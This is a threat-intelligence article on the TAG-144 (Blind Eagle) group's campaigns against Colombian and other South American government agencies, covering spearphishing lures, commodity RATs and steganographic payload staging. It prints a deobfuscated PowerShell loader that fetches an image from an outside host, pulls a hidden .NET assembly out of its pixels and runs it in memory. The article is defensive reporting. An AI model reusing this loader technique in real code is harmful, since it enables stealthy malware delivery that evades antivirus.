Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.
First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.
In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.
Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.
These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.
Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.
.webp "TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures 3")
The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.
Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.
Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.
.webp "TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures 4")
Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.
For example, the deobfuscated PowerShell segment responsible for this process appears as:
$tormodont="https://archive.org/download/universe-.../universe.jpg"
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent','Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data
foreach ($y in 0..($bitmap.Height-1)) {
foreach ($x in 0..($bitmap.Width-1)) {
$color = $bitmap.GetPixel($x,$y)
$bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
}
}
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.
By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
